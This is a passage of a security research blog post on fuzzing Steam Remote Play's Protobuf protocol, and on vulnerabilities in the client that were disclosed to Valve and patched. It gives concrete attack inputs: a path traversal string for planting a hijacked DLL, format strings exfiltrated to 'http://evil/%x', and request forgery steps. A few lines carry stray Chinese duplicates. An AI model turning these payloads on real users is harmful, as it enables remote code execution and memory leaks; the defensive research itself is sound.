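Listing a single transport is what leaves the server no other choice than the one the client wants.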
We will not go to the extent of detailing the whole discovery protocol in this post, but it needed to be reversed and reimplemented to be authenticated on a local Steam instance.
Indeed, when you discover and connect to a machine, your device gets paired to it by being assigned a client ID and by sharing a discovery key.
It is possible to borrow a discovery key (this only needs to be done once, for example through debugging) and reuse it in a custom implementation of the discovery protocol in order to get authenticated.
The server eventually answers with a Device Streaming Response that contains the port to connect to for the Remote Play session, as well as a randomly generated session key that can be decrypted using the client discovery key.
The rest of the client implementation process is quite similar to the server one.
Implementing a dedicated fuzzer
rpfuzz: a fuzzer for the Remote Play protocol
The client and server reimplementations described in the previous section were extensively used to play around with the protocol, and naturally evolved into a basic fuzzer, which was given the very unconventional name rpfuzz (for remote play fuzzer).
The idea was to keep on playing around with the protocol by writing a little fuzzer from scratch on top of the existing code, to see if we could stumble upon “quick wins” by randomly mutating Protobuf messages.
The following diagram describes rpfuzz’s software architecture.
The network component (orange block) is interchangeable: depending on the target, it can be replaced by a server implementation, or by a client implementation (coupled with the discovery protocol). It is in charge of communicating with the target.
The Fuzzer component runs on a separate thread. It supports both control messages and audio/video channels.
Control message fuzzing is essentially stateless. It consists of a loop that randomly chooses a message type and passes the associated protobuf class to a mutation engine, pbfuzz, which will be covered in more depth later. pbfuzz sends back a Python object that generates an endless amount of mutations, which are assembled into messages and then sent to the target through the network implementation.
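The stateless loop described above could be sketched as follows. This is a simplified illustration rather than rpfuzz's actual code: the mutate and send callables are hypothetical stand-ins for pbfuzz and for the network component, and message types are represented by their names instead of Protobuf classes.

```python
import random


def fuzz_control_messages(message_types, mutate, send, iterations, seed=None):
    """Stateless loop: pick a message type, mutate it, send it.

    message_types: list of message type names (stand-ins for Protobuf classes)
    mutate:        callable(type_name, rng) -> bytes (stand-in for pbfuzz)
    send:          callable(type_name, payload) (stand-in for the network side)
    """
    rng = random.Random(seed)
    for _ in range(iterations):
        type_name = rng.choice(message_types)
        payload = mutate(type_name, rng)
        send(type_name, payload)


def toy_mutate(type_name, rng):
    """Toy mutator returning 0 to 16 random bytes, so the sketch runs alone."""
    return bytes(rng.getrandbits(8) for _ in range(rng.randint(0, 16)))


sent = []
fuzz_control_messages(
    ["CSetTouchIconDataMsg", "CRemotePlayTogetherGroupUpdateMsg"],
    toy_mutate,
    lambda name, payload: sent.append((name, payload)),
    iterations=100,
    seed=1234,
)
print(len(sent), "messages sent")
```

Seeding the random generator is a design choice made for this sketch: it makes a run repeatable, which complements the logging and replay features described below.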
On the other hand, fuzzing remote HID messages requires stateful actions, such as sending a request to open a device. In the same way, fuzzing audio/video channels requires opening a new dynamic channel.
A few other nice features were implemented, namely a replay system, a scenario system and a logging system.
The Logger simply saves all the mutations sent during a fuzzing session to a file. Keeping this fuzzing history is useful for debugging and analyzing crashes.
These logs can also be fed back to the Replay System, which will replay all the messages from a session one at a time. This can prove useful to try and reproduce a (deterministic enough) crash, by hopefully bringing the target to a state that has already been reached before.
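As an illustration, a logger and replay system of this kind can be very small. The sketch below assumes a log format of one JSON object per line with a hex-encoded payload; this format and the function names are hypothetical, not necessarily what rpfuzz uses.

```python
import io
import json


def log_mutation(log_file, type_name, payload):
    """Append one sent message to the session log (one JSON object per line)."""
    record = {"type": type_name, "payload": payload.hex()}
    log_file.write(json.dumps(record) + "\n")


def replay(log_file, send):
    """Re-send every logged message, in order, and return how many were sent."""
    count = 0
    for line in log_file:
        record = json.loads(line)
        send(record["type"], bytes.fromhex(record["payload"]))
        count += 1
    return count


# In-memory file for demonstration; a real session would log to disk.
session_log = io.StringIO()
log_mutation(session_log, "CSetIconMsg", b"\x08\x01")
log_mutation(session_log, "CSetCursorImageMsg", b"\x10\xff")

session_log.seek(0)
replayed = []
replay(session_log, lambda name, payload: replayed.append((name, payload)))
print(replayed)
```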
Finally, a Scenario System was designed to write specific scenarios and play them at any time. It was especially useful to reproduce bugs and write proofs of concept. In addition, each bug scenario can specify a condition that any message triggering the associated bug necessarily satisfies. Thanks to this, the fuzzer knows which messages to avoid, and is not slowed down by crashes that have already been found.
pbfuzz: a custom Protobuf mutation engine
pbfuzz is (you guessed it) another unconventional name, standing for protobuf fuzzer.
One of the challenges usually brought by fuzzing stateful network protocols is that of grammatical awareness. In our case, existing mutation engines from fuzzing frameworks can definitely not be adopted out of the box, as they would break the structure of the messages. Even worse, they would completely garble the serialized Protobuf data, hence the need for a Protobuf-aware mutation engine.
The choice was made to write a custom Protobuf mutation engine from scratch for more flexibility, better integration and educational purposes. Other contenders for this component include libprotobuf-mutator, which was not investigated and could constitute a valid alternative, and ProtoFuzz, a Python library that ended up lacking flexibility for our use case and had too many bugs (such as broken support for repeated fields).
At its core, pbfuzz relies on playing with inner objects and attributes of Google’s protobuf module, in order to walk through message descriptors, types and labels. Although the fuzzer is model-based and does not require input seeds (the Protobuf definitions are known in advance), several mutation strategies were implemented for each field type, taking inspiration from traditional model-less mutation engines.
Strings and bytes fields can undergo bit flips, byte substitutions, trimming, or insertion of random or “interesting” data like string formatters (%x, %s, %n), paths, URLs, XML, JSON… of random length. These could trigger buffer overflows, format string vulnerabilities, logic bugs, or other kinds of higher-level bugs.
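The strategies listed above for strings and bytes fields can be sketched as follows. The function names and the small dictionary of "interesting" payloads are illustrative assumptions, not pbfuzz's actual implementation.

```python
import random

# Hypothetical dictionary of "interesting" payloads, modeled on the list above.
INTERESTING = [b"%x", b"%s", b"%n", b"../", b"http://127.0.0.1/", b"<a>", b"{}"]


def bit_flip(data, rng):
    """Flip one random bit (no-op on empty input)."""
    if not data:
        return data
    out = bytearray(data)
    out[rng.randrange(len(out))] ^= 1 << rng.randrange(8)
    return bytes(out)


def byte_substitute(data, rng):
    """Replace one random byte with a random value (no-op on empty input)."""
    if not data:
        return data
    out = bytearray(data)
    out[rng.randrange(len(out))] = rng.randrange(256)
    return bytes(out)


def trim(data, rng):
    """Cut the data at a random position."""
    return data[: rng.randint(0, len(data))]


def insert_interesting(data, rng):
    """Insert an interesting payload, repeated 1 to 8 times, at a random offset."""
    pos = rng.randint(0, len(data))
    chunk = rng.choice(INTERESTING) * rng.randint(1, 8)
    return data[:pos] + chunk + data[pos:]


MUTATORS = [bit_flip, byte_substitute, trim, insert_interesting]


def mutate_bytes(data, rng):
    """Apply one randomly chosen strategy."""
    return rng.choice(MUTATORS)(data, rng)


print(mutate_bytes(b"icon.png", random.Random(0)))
```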
Integer fields (and floats) are also mutated with interesting values, depending on bit size (32, 64) and signedness, which may expose integer overflows or out-of-bounds accesses.
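A minimal sketch of how such interesting values could be derived from the bit size and signedness of a field is shown below. The exact set of values is an assumption (type boundaries plus a few classic power-of-two edges), not the list pbfuzz uses.

```python
def interesting_integers(bits, signed):
    """Return boundary values that fit an integer field of the given width."""
    if signed:
        lo, hi = -(1 << (bits - 1)), (1 << (bits - 1)) - 1
    else:
        lo, hi = 0, (1 << bits) - 1
    candidates = {
        lo, lo + 1, hi - 1, hi,           # limits of the type itself
        0, 1,
        0x7F, 0x80, 0xFF, 0x100,          # 8-bit edges
        0x7FFF, 0x8000, 0xFFFF, 0x10000,  # 16-bit edges
    }
    if signed:
        candidates.add(-1)
    # Keep only the values that are representable in the field.
    return sorted(v for v in candidates if lo <= v <= hi)


print(interesting_integers(32, signed=True))
```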
Repeated fields (lists) can go through single mutations (only one element of the list is mutated), random trims or random insertions of random lengths. Nested message fields are mutated recursively as well.
Finally, fields marked as optional can also be deliberately omitted at random: indeed, a program could try accessing fields from a deserialized object without verifying whether they are actually present, leading to potentially unexpected behavior.
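The list strategies and the random omission of optional fields could look like the sketch below. It works on plain Python lists and dictionaries rather than on real Protobuf messages, and all names, as well as the default omission probability, are hypothetical.

```python
import random


def mutate_repeated(items, mutate_item, rng):
    """Apply one list strategy: single mutation, random trim or random insertions."""
    items = list(items)
    strategy = rng.choice(["single", "trim", "insert"])
    if strategy == "single" and items:
        pos = rng.randrange(len(items))
        items[pos] = mutate_item(items[pos], rng)
    elif strategy == "trim":
        items = items[: rng.randint(0, len(items))]
    else:
        # Insertions; also reached when "single" is drawn on an empty list.
        for _ in range(rng.randint(1, 8)):
            base = rng.choice(items) if items else 0  # assumes integer elements
            items.insert(rng.randint(0, len(items)), mutate_item(base, rng))
    return items


def drop_optional(fields, optional_names, rng, probability=0.2):
    """Return a copy of the message fields with some optional ones omitted."""
    return {
        name: value
        for name, value in fields.items()
        if name not in optional_names or rng.random() >= probability
    }


rng = random.Random(42)
print(mutate_repeated([1, 2, 3], lambda value, r: value ^ r.getrandbits(8), rng))
print(drop_optional({"appid": 1, "icon": "a.png"}, {"appid", "icon"}, rng))
```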
Fuzzing results and crash analysis
The fuzzing speed was limited by the target’s packet processing speed; in other words, the target acted as a bottleneck and the fuzzing speed had to be adjusted manually not to cause an overload. Still, the fuzzer was able to send 100 to 1000 messages per second without overworking the target too much.
In terms of surface, all the control messages were successfully reached, with the exception of a few obsolete or unimplemented message types. Audio/video codecs were also all reached, except for the raw accelerated graphics format and the HEVC codec, for which channels could not be opened for some reason.
The fuzzer could benefit from multiple improvements: for instance, it does not feature any dynamic instrumentation ability or code coverage, and it is not able to synchronize with the target either. But even though rpfuzz is rather naive and black-box driven, it proved to be largely sufficient to uncover several bugs, as discussed in the next section.
pbfuzz also comes with its own set of limitations: it only supports Protobuf 2, does not implement some concepts (like unions, maps or extensions, which are practically non-existent in Remote Play), and could also feature better string mutators. However, it is rather efficient and malleable, and could be reused to fuzz other targets that feature Protobuf communications.
To monitor crashes, a simple approach was to attach a debugger to the target in order to intercept and analyze them. PageHeap was also enabled, which is a must-have to keep track of any out-of-bounds access in the heap.
Time Travel Debugging is another nice tool to have in the toolbox to analyze certain crashes or bigger schemes that involve more convoluted control flows. More specifically, the ttddbg plugin for IDA is neat: it supports loading a TTD trace and debugging it.
Vulnerabilities
A couple dozen bugs were identified thanks to rpfuzz. They affect Remote Play in the Steam client, as well as the Steam Link product. They should be reproducible on other platforms (Linux, Android, iOS), although this was not verified for all of them.
A lot of these bugs are unexploitable and/or uninteresting, so in this post we will only go through a few of the more technically interesting ones in detail.
The vulnerabilities that were found all target the client implementation, although a few minor bugs were also found in the server implementation.
Description | Impact |
---|---|
CSetTouchIconDataMsg path traversal file write | Remote code execution |
CRemotePlayTogetherGroupUpdateMsg format string bugs | Remote memory leak |
CRemotePlayTogetherGroupUpdateMsg request forgery | Info leak / pivot |
CRemotePlayTogetherGroupUpdateMsg out-of-bounds access | Type confusion |
Video channel YV12 data heap overflow | Remote (?) heap leak |
CRemoteHIDMsg gamepad input report heap overflow | Unknown |
Path traversal file write in CSetTouchIconDataMsg
This vulnerability is a perfect example of the “fuzzing is not only about crashes” rule: side effects of fuzzing on the system can also reveal bugs.
Here, we can see that weird-looking files with random (mutated) names and contents were created inside the client’s SteamLink application data folder:
Fun fact: I only noticed these files by chance 5 months after their creation, which means this vulnerability could have been fixed long before my SSTIC talk…
CSetTouchIconDataMsg is a control message that allows the host of a Remote Play session to synchronize image files, such as controller binding icons originating from C:\Program Files (x86)\Steam\tenfoot\resource\images\library\controller\binding_icons. The icons are then downloaded into %APPDATA%\Valve Corporation\SteamLink.
The protobuf definition for this message type is the following:
message CSetTouchIconDataMsg {
optional uint32 appid = 1;
optional string icon = 2;
optional bytes data = 3;
}
When the client receives an icon field that starts with "@", it is first MD5-hashed:
if (icon_name[0] == '@') {
MD5_Init(&ctx);
MD5_Update(&ctx, &appid, 4);
MD5_Update(&ctx, icon_name, strlen(icon_name));
MD5_Final(&ctx, &path);
}
However, if the icon name does not start with "@", the client directly uses it as a relative path for a file write inside the SteamLink application data folder. The host therefore fully controls the name of the file to write (icon), but also the contents that are written to this file (data).
An attacker can abuse this fact to write an arbitrary file on the victim’s file system by leveraging path traversal. Files can even be overwritten, and folders created recursively if they do not exist.
From there, many techniques can be applied to achieve remote code execution. I chose to illustrate the vulnerability with a basic DLL hijack.
Using Process Monitor, one can notice that the Steam client attempts to load winhttp.dll, a DLL that is not found inside the Steam folder and thus fetched from System32.
By sending the icon string ../../../../../../Program Files (x86)/Steam/winhttp.dll, we can create an arbitrary DLL inside the victim’s Steam folder. When the streaming client (or Steam) restarts, it will load the hijacked DLL: arbitrary code can then be executed.
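To see why this icon string escapes the SteamLink folder, here is a small sketch that resolves it the way Windows would, using Python's ntpath module. The base folder is a hypothetical expansion of %APPDATA%\Valve Corporation\SteamLink for a user named victim. The hashed_name helper mimics the "@" branch shown earlier; the little-endian appid and the hexadecimal rendering of the digest are assumptions, and the appid value is arbitrary.

```python
import hashlib
import ntpath
import struct

# Hypothetical expansion of %APPDATA%\Valve Corporation\SteamLink.
BASE = r"C:\Users\victim\AppData\Roaming\Valve Corporation\SteamLink"


def resolve(base, icon):
    """Resolve an icon name relative to the base folder, Windows-style."""
    return ntpath.normpath(ntpath.join(base, icon))


def escapes_base(base, icon):
    """Return True if the resolved path is not located under the base folder."""
    resolved = resolve(base, icon).lower()
    prefix = ntpath.normpath(base).lower() + "\\"
    return not resolved.startswith(prefix)


def hashed_name(appid, icon):
    """MD5 over the 4-byte appid followed by the icon name, as a hex string."""
    # ASSUMPTION: little-endian appid, digest rendered as hexadecimal.
    return hashlib.md5(struct.pack("<I", appid) + icon.encode()).hexdigest()


icon = "../../../../../../Program Files (x86)/Steam/winhttp.dll"
print(resolve(BASE, icon))
print(escapes_base(BASE, icon))
print(escapes_base(BASE, hashed_name(480, icon)))
```

Six ".." components are exactly enough to climb from this folder back to the root of the drive, and a hashed name cannot contain any path separator, which is why hashing every icon name closes the hole.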
Here is a video proof-of-concept:
The video shows both the attacker’s computer and the victim’s. The attacker invites the victim to a Remote Play session in the game Ultimate Tic-Tac-Toe. Note: here the victim is a friend, but this is not necessary; the attacker could have generated an invite link and sent it to anyone.
Once the session is established, the attacker silently delivers the payload by injecting a DLL into their own Steam process. Then, the victim is kicked out of the session. When they restart the Steam client, calc.exe shows up instead.
Valve patched the vulnerability by ensuring all icon names are MD5-hashed, independently of the first character being a "@" or not.
Format string bugs in CRemotePlayTogetherGroupUpdateMsg
Earlier, this message type was given as an example of a rather complex message type that could conceal many bugs. Well, this was done on purpose, because it is really full of bugs: the next three vulnerabilities we are going to cover all target this structure.
message CRemotePlayTogetherGroupUpdateMsg {
message Player {
optional uint32 accountid = 1;
optional uint32 guestid = 2;
optional bool keyboard_enabled = 3;
optional bool mouse_enabled = 4;
optional bool controller_enabled = 5;
repeated uint32 controller_slots = 6;
optional bytes avatar_hash = 7;
}
repeated .CRemotePlayTogetherGroupUpdateMsg.Player players = 1;
optional int32 player_index = 2;
optional string miniprofile_location = 3;
optional string game_name = 4;
optional string avatar_location = 5;
}
This message is basically sent by the session host to notify the guest of various things: who the players in the current session are, where their avatars are stored, etc.
There are two distinct format string vulnerabilities in the code that handles this message.
In the CMiniProfileLoader::LoadProfiles function, a loop iterates over the players list.
while (n_players--) {
Player = *Players++;
if (Player->accountid) {
CMiniProfileLoader::LoadAccountProfile(
this,
RemotePlayTogetherGroupUpdateMsg->miniprofile_location,
Player->accountid
);
}
else if (Player->guestid) {
binarytohex(Player->avatar_hash, avatar_hash_size, hash_hex, 41);
CUtlString::Format(
url,
RemotePlayTogetherGroupUpdateMsg->avatar_location,
hash_hex,
hash_hex
);
CMiniProfileLoader::LoadGuestProfile(this, url, Player->guestid);
free(url);
}
}
When an accountid field is provided in the current player object in the list, the CMiniProfileLoader::LoadAccountProfile method eventually calls:
CUtlFmtString::CUtlFmtString(url, miniprofile_location, accountid);
The miniprofile_location field, which is controlled by the attacker (host), is naively used as a format string. The attacker also controls the first argument to the format string (accountid).
Therefore, the host can leak arbitrary memory from the process, using formatters such as %x and %s (unfortunately, the %n formatter is disabled by default, thus no write primitive).
The formatted string is later used as a URL and a CURL request is performed.
There are two ways the attacker can retrieve the formatted string:
- Exfiltrate over HTTP (e.g. set miniprofile_location to http://evil/%x and log the request);
- Read received debug strings over the Stats channel (0x2).
The second option is the easiest one to carry out since it happens automatically. Indeed, by setting the miniprofile_location field to "Leak: %08x.%08x.%08x.%08x", the CURL request fails and a debug string that looks like the following is output:
DebugString: "Web request Leak: 13374242.11fe0ff0.11fe0fec.13374242 failed, CURL error code 3, HTTP error code 0"
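On the attacker's side, recovering the leaked values from such a debug string is a matter of a regular expression. The sketch below assumes the "Leak: " marker and the dot-separated %08x layout used in the example above; the function name is hypothetical.

```python
import re

# Matches the marker, then one or more 8-digit hex values separated by dots.
LEAK_RE = re.compile(r"Web request Leak: ((?:[0-9a-f]{8}\.)*[0-9a-f]{8}) failed")


def parse_leak(debug_string):
    """Extract the leaked 32-bit values from a debug string, or return []."""
    match = LEAK_RE.search(debug_string)
    if match is None:
        return []
    return [int(chunk, 16) for chunk in match.group(1).split(".")]


line = ("Web request Leak: 13374242.11fe0ff0.11fe0fec.13374242 failed, "
        "CURL error code 3, HTTP error code 0")
for value in parse_leak(line):
    print(hex(value))
```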
We haven’t talked about the Stats channel much yet. It implements a few message types:
enum EStreamStatsMessage {
k_EStreamStatsFrameEvents = 1;
k_EStreamStatsDebugDump = 2;
k_EStreamStatsLogMessage = 3;
k_EStreamStatsLogUploadBegin = 4;
k_EStreamStatsLogUploadData = 5;
k_EStreamStatsLogUploadComplete = 6;
}
This channel includes a message type used to send log messages, k_EStreamStatsLogMessage, whose protobuf definition is the following:
message CLogMsg {
optional int32 type = 1;
optional string message = 2;
}
The streaming client happens to always automatically send all the debug strings over to the host via this channel and message! They’re even in plaintext.
Thus, the attacker retrieves the leaks without effort.
The second format string vulnerability is highly similar to the first one. When guestid is set, the following call is performed:
CUtlString::Format(
url,
RemotePlayTogetherGroupUpdateMsg->avatar_location,
hash_hex,
hash_hex
);
Again, avatar_location is a host-controlled field and is used as a format string. Since the formatted string is also used as a URL inside a CURL request, the same exfiltration techniques as before apply.
In terms of impact, these vulnerabilities allow an attacker to reliably and fully break ASLR on the victim’s machine, which is very often the first step of a memory corruption exploit.
More particularly on Windows, breaking ASLR for various Steam-related DLLs (such as steamclient.dll) or other Windows DLLs can greatly help to further compromise the system in any other attack targeting the Steam client.
An attacker could also leak practically anything in the process’s memory, including potentially sensitive data (environment variables, paths, tokens…).
Valve patched these vulnerabilities by denying URLs that contain the character '%'.
Request forgery in CRemotePlayTogetherGroupUpdateMsg
This vulnerability is a direct follow-up to the previous one.
Since the miniprofile_location field is a fully host-controlled URL, an attacker can make the client perform an arbitrary HTTP(S) GET request (sadly, other URL schemes such as file:// are disabled by the CURL options set in the client).
At this point, the client expects the CURL response to be a valid JSON file, which will in turn be parsed. However, if the response is not a valid JSON string, the following debug string will be output and sent back to the attacker:
"Couldn't parse profile data: syntax error at line 1 near: <RESPONSE CONTENTS>"
An attacker can exfiltrate the response to any HTTP GET request performed client-side! As long as the output is not JSON, of course.
This gives a so-called SSRF primitive (server-side request forgery), but here I would rather call it a CSRF because the vulnerability lies on the client’s side, although the acronym CSRF is usually “reserved” for the cross-site request forgery web vulnerability…
With such a primitive, an attacker could leak potentially sensitive data hosted on local web pages or over an internal network. They could also scan the victim’s internal network for recon (IP ranges, port scan).
If a vulnerable internal service is found, an attacker could even pivot by exploiting it through GET requests (e.g. SQL injection in GET parameter): the possibilities are endless.
Just for fun, we can try going a little deeper. I said the client expects a JSON string from the response, but what kind? Since the attacker controls it, it could be an additional attack vector.
It appears that the client expects a JSON like the following:
{
"avatar_url": "http://site/toto.png",
"persona_name": "xyz"
}
The client will then download the avatar and put it in local storage (usually in %APPDATA%\Valve Corporation\SteamLink). For instance, toto.png will be saved to avatars/to/toto.png:
CUtlFmtString::CUtlFmtString(v14, "%s/avatars/%.2s/%s", StoragePath, filename, filename);
Unfortunately, there is no way to inject a "/" or "\" to perform path traversal here. The best I could do is write a file to the parent folder: with a filename like ..toto.txt, the saved file will be avatars/../..toto.txt, so ..toto.txt will end up in the local storage root folder. But since in this case the filename starts with .., we won’t be able to overwrite any interesting configuration file.
One may also drop a malicious file inside the avatars folder, but there is no way to execute it. You could also create a folder using an NTFS alternate data stream like toto::$INDEX_ALLOCATION (a lesser-known trick… but pointless).
Valve patched this vulnerability by introducing a whitelist domain filter.
OOB access in CRemotePlayTogetherGroupUpdateMsg
This bug resides yet again in the CRemotePlayTogetherGroupUpdateMsg message, but this time in the player_index field:
message CRemotePlayTogetherGroupUpdateMsg {
message Player {
optional uint32 accountid = 1;
optional uint32 guestid = 2;
optional bool keyboard_enabled = 3;
optional bool mouse_enabled = 4;
optional bool controller_enabled = 5;
repeated uint32 controller_slots = 6;
optional bytes avatar_hash = 7;
}
repeated .CRemotePlayTogetherGroupUpdateMsg.Player players = 1;
optional int32 player_index = 2; // <---
optional string miniprofile_location = 3;
optional string game_name = 4;
optional string avatar_location = 5;
}
As you can see, player_index is a signed 32-bit integer. It is used to notify the client of which index in the players list corresponds to the host player in the session.
In order to reproduce this bug, the host must send two messages:
- The CRemotePlayTogetherGroupUpdateMsg with a large enough player_index;
- A certain CSetStreamingClientConfig message that will actually trigger the bug.
Indeed, sending a certain CSetStreamingClientConfig message to the client (which I didn’t exactly characterize; I only replayed the same message that my fuzzer stumbled upon) causes the CRemotePlayTogetherDialog::Update method to be called:
do {
Player = Players[k];
is_host = k == this->player_index;
if ( k == this->n_players - 1 && this->player_index > k ) {
is_host = 1;
Player = Players[this->player_index];
}
// ...
CRemotePlayTogetherDialog::UpdatePlayerState(
this,
/* ... */,
Player,
is_host
);
} while ( ++k < this->n_players );
There is basically a loop over a list of players. The Player variable should be a valid pointer to a CRemotePlayTogetherGroupUpdateMsg_Player structure that represents a player, especially when it is passed over to CRemotePlayTogetherDialog::UpdatePlayerState.
It turns out that this->player_index is the player_index value from the latest seen CRemotePlayTogetherGroupUpdateMsg message, which the attacker controls.
At the last loop iteration, since this->player_index > k is a signed comparison, the attacker can only enter the if branch when player_index is a positive signed integer. Other than that, satisfying the condition is trivial and leaves a lot of room to go out of bounds, relative to the start of the players vector.
Even better: if the attacker has never sent a list of players through CRemotePlayTogetherGroupUpdateMsg before, then Players is NULL, and this is never checked. Since the client lives in a 32-bit process, the attacker can point pretty much anywhere in memory.
This effectively leads to type confusion: given an ASLR leak, an attacker could craft a fake Player structure somewhere in memory (maybe with some heap spraying) and have it passed as the Player object to the UpdatePlayerState method.
If this latter function wrote to fields of the Player structure, this would give an arbitrary write primitive.
Unfortunately, the UpdatePlayerState method doesn’t do anything really interesting with the Player structure: barely a few read accesses (that are in turn not used for any other write access).
Still, this bug highlights how some bugs can be stateful, and how fuzzing many message types at once can help uncover those.
Heap overflow in YV12 video frames
We saw that in order to transmit audio and video data, several codecs and formats are available.
Before sending video data, the host must send a CStartVideoDataMsg message and specify a video codec:
message CStartVideoDataMsg {
required uint32 channel = 1;
optional .EStreamVideoCodec codec = 2 [default = k_EStreamVideoCodecNone];
optional bytes codec_data = 3;
optional uint32 width = 4;
optional uint32 height = 5;
}
enum EStreamVideoCodec {
k_EStreamVideoCodecNone = 0;
k_EStreamVideoCodecRaw = 1;
k_EStreamVideoCodecVP8 = 2; // unimplemented?
k_EStreamVideoCodecVP9 = 3; // unimplemented?
k_EStreamVideoCodecH264 = 4;
k_EStreamVideoCodecHEVC = 5;
k_EStreamVideoCodecORBX1 = 6; // unimplemented?
k_EStreamVideoCodecORBX2 = 7; // unimplemented?
}
If the host chooses the raw codec, they can send video frames with raw pixel data over the newly opened channel. The structure for video frames becomes the following:
Field | Size (bytes) |
---|---|
Packet type (k_EStreamDataPacket) | 1 |
Video sequence number | 2 |
Timestamp | 4 |
Unknown | 6 |
Length of protobuf data | 1 |
Protobuf data (CVideoFormat message) | variable |
Raw video data | variable |
First of all, the length field for the serialized protobuf data is not even checked, so the client may try to deserialize up to 256 bytes of out-of-bounds heap data and crash, although this cannot be exploited for an info leak.
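For reference, here is a sketch of a parser for this frame layout that performs the missing length check. The field sizes come from the table above; the little-endian byte order and the function name are assumptions.

```python
import struct

HEADER_SIZE = 1 + 2 + 4 + 6 + 1  # fixed fields from the table above: 14 bytes


def split_video_frame(packet):
    """Split a raw frame into (sequence, timestamp, protobuf bytes, video data).

    Raises ValueError instead of reading past the end of the packet.
    """
    if len(packet) < HEADER_SIZE:
        raise ValueError("packet shorter than the fixed header")
    # ASSUMPTION: multi-byte integers are little-endian.
    _packet_type, sequence, timestamp = struct.unpack_from("<BHI", packet, 0)
    proto_len = packet[HEADER_SIZE - 1]  # 1-byte length, after the unknown field
    proto_end = HEADER_SIZE + proto_len
    if proto_end > len(packet):
        raise ValueError("protobuf length exceeds the packet size")
    return sequence, timestamp, packet[HEADER_SIZE:proto_end], packet[proto_end:]


frame = (struct.pack("<BHI", 1, 7, 1000) + bytes(6) + bytes([3])
         + b"\x08\x01\x10" + b"RAW")
print(split_video_frame(frame))
```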
The CVideoFormat message specifies the data format of the frame, and its dimensions:
message CVideoFormat {
required .EVideoFormat format = 1 [default = k_EVideoFormatNone];
optional uint32 width = 2;
optional uint32 height = 3;
}
As shown in the codec and format tree diagram earlier, the raw codec implements two distinct encoding formats:
enum EVideoFormat {
k_EVideoFormatNone = 0;
k_EVideoFormatYV12 = 1;
k_EVideoFormatAccel = 2;
}
The vulnerability specifically lies in the YV12 format. When frames are rendered inside CStreamPlayer::BUpdateVideo, here is what happens:
if ( VideoFormat == k_EVideoFormatYV12 ) {
// [...]
SDL_UpdateYUVTexture(texture, 0, Yplane, Ypitch, Uplane, Upitch, Vplane, Vpitch);
SDL_RenderCopy(renderer, texture, src_rect, dst_rect);
}
The Y, U, V planes passed to SDL_UpdateYUVTexture are pointers to different sections inside the video data. These pointers depend on the host-provided frame dimensions.
YUV, or YCbCr, is a type of color space that uses one luminance component and two chrominance components. Initially designed for television, it is more efficient than RGB for visual perception.
However, no check is performed on the size of the video data sent by the host. Thus, an attacker can specify large frame dimensions, but send less video data than expected.
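The missing check boils down to comparing the amount of received data with the size implied by the dimensions. In YV12, the Y plane holds one byte per pixel, and the V and U planes are each subsampled by two in both directions. The sketch below assumes tightly packed planes (pitch equal to width), and the function names are hypothetical.

```python
def yv12_frame_size(width, height):
    """Bytes needed for one YV12 frame (4:2:0, 8 bits per sample)."""
    chroma_width = (width + 1) // 2    # rounded up for odd dimensions
    chroma_height = (height + 1) // 2
    return width * height + 2 * chroma_width * chroma_height


def frame_is_complete(width, height, video_data):
    """Return True if the buffer is large enough for the announced dimensions."""
    return len(video_data) >= yv12_frame_size(width, height)


print(yv12_frame_size(1920, 1080))
print(frame_is_complete(1920, 1080, bytes(16)))
```

A 1920x1080 frame requires about 3 MB of data, so announcing such dimensions while sending only a handful of bytes makes the renderer read far beyond the end of the buffer.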
A heap overflow occurs inside SDL_UpdateYUVTexture, and a lot of heap memory is leaked. The whole texture is rendered anyway, and the client may see something like this:
I thought of a way to exfiltrate the leak, but it’s not the most convincing and requires extra user interaction, which is why I may not go as far as calling the vulnerability a remote heap leak:
- Send a malicious CStreamingClientConfig message to the client that will enable the performance overlay.
- Ask the client to press “F8”. As the performance overlay is enabled, this will silently upload a screenshot of the rendered SDL window to the host.
- Listen to the Stats channel (CDebugDumpMsg) to retrieve a PNG file containing the texture, and convert the RGB pixels to YUV to read the leaked heap data.
The second step can be done in various ways, such as direct social engineering, or sending fake video data that tricks the client player into pressing F8 as if it were a game mechanic… but nothing can be done without additional user interaction.
I also wondered whether the server had the ability to remap the victim’s keyboard in order to trick them into uploading a screenshot by pressing any other key, but couldn’t work it out.
Moreover, converting the leaked pixels back from RGB to YUV space is not trivial as the conversion is not lossless in practice, partly because of floating point calculation.
Similar, funny heap leaks were also found in the CSetIconMsg and CSetCursorImageMsg messages, which allow the host to send raw RGBA images to set as window icon and system cursor.
Again, both components suffer from out-of-bounds read accesses in the heap because the image data size is not properly checked. For instance, here is a leaky 128px * 128px cursor:
Heap overflow in CRemoteHIDMsg gamepad logic
This bug was found by fuzzing the client while an Xbox controller was plugged in (XInput device).
First, the device should be opened through a CHIDMessageToRemote.DeviceOpen message, by specifying a path like sdl://1.
When the host asks for HID input reports, the following message is sent:
message DeviceStartInputReports {
optional uint32 device = 1;
optional uint32 length = 2;
}
Then, the report generator component (CHIDDeviceReportGenerator
) collects the reports and allocates a CUtlBuffer
object to store them, of attacker-controlled size (length
field), but which cannot exceed 27 bytes.
Eventually, the serializing logic (HIDDeviceSDLGamepadStateV2_t::Pack
) writes to this buffer. If the attacker provided length
field is too small, there is an out-of-bounds write in the heap.
最终,序列化逻辑 ( HIDDeviceSDLGamepadStateV2_t::Pack
) 写入此缓冲区。如果攻击者提供的 length
字段太小,则堆中存在越界写入。
The overflow is very small (a few bytes) and the attacker is not in control of the written contents, which originate from a controller-specific structure (joystick axis, button data…).
溢出非常小(几个字节),攻击者无法控制写入的内容,这些内容源自控制器特定的结构(操纵杆轴、按钮数据……
This makes exploitation very hard, but perhaps not impossible; it was not explored further.
Timeline
Date | Event |
---|---|
2022-10-12 | I submit a 1st report on HackerOne about the format string & request forgery vulnerabilities. |
2022-10-18 | H1 analyst fails to reproduce the PoC, most likely because they did not adjust a certain function offset that varies between Steam versions (of course, the delay between the responses and the frequent Steam updates didn’t help the case). I respond in less than an hour and offer to help analyze their DLL to find the correct offset. |
2022-11-01 | H1 analyst declines my help and instead asks for detailed instructions as to how they can reverse engineer the DLL themselves to find the offset. |
2022-11-01 | Valve staff member changes the report status to Triaged. |
2022-11-05 | I provide detailed instructions, with screenshots, on how to retrieve in IDA the function offset needed to make the PoC work. Not sure if this ever helped since I never heard back from the H1 analyst (obviously Valve would have no use for such instructions since they have Steam’s source code and PDB symbols). |
2022-11-08 | Valve rewards me with a bounty and pushes a fix on the Steam Client Beta channel. |
2022-11-09 | I take a look at the fix, and notice that seemingly only the request forgery vulnerabilities have been patched: the format strings remain untouched. Since the fix is not necessarily trivial, I suggest a few ideas for potential workarounds. |
2022-12-14 | I follow up with them after a month without news. |
